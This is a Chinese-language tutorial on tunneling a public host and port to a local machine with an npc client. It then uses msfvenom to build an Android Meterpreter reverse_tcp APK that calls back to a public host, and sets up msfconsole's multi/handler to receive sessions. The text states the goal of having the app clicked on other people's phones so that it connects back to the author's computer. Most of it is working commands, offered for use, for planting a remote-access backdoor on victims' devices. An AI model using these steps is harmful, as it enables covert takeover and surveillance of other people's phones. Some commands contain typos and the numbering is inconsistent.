目录
一、思路概述
在内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。
使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
二、实现步骤
1.测试主机连通性
2.注册账号并开通隧道
2.下载客户端
3.配置客户端
#解压
tar -zxvf linux_amd64_client.tar.gz
#进入到目录
cd linux_amd64_client
#赋予权限
sudo chmod +x npc
#启动命令
./npc -server=xxxxx -vkey=xxxx
至此主机与公网端口之间映射完毕。
4.生成App
注:这里只是我映射了两个端口,只有知道他们三者之间是一一对应的从而完成App生成就行。
msfvenom -p android/meterpreter/reverse_tcp lhost=free.svipss.top lport=15575 R>zzh.apk
#msfvenom -p android/meterpreter/reverse_tcp lhost=公网地址或者网址 lport=公网端口 R>zzh.apk
5、启动msfconsole
1.加载模块
use exploit/multi/handler
2.设置payload监听
set payload android/meterpreter/reverse_tcp
3.设置options
set lhost 127.0.0.1
set lport 7890
注:App生成详情msf渗透(内网)
6.使用
7.关于 apache2的相关补充
# 启动apache2
service apache2 satrt
# 对apache2的配置文件进行更改
vim /etc/apache2/ports.conf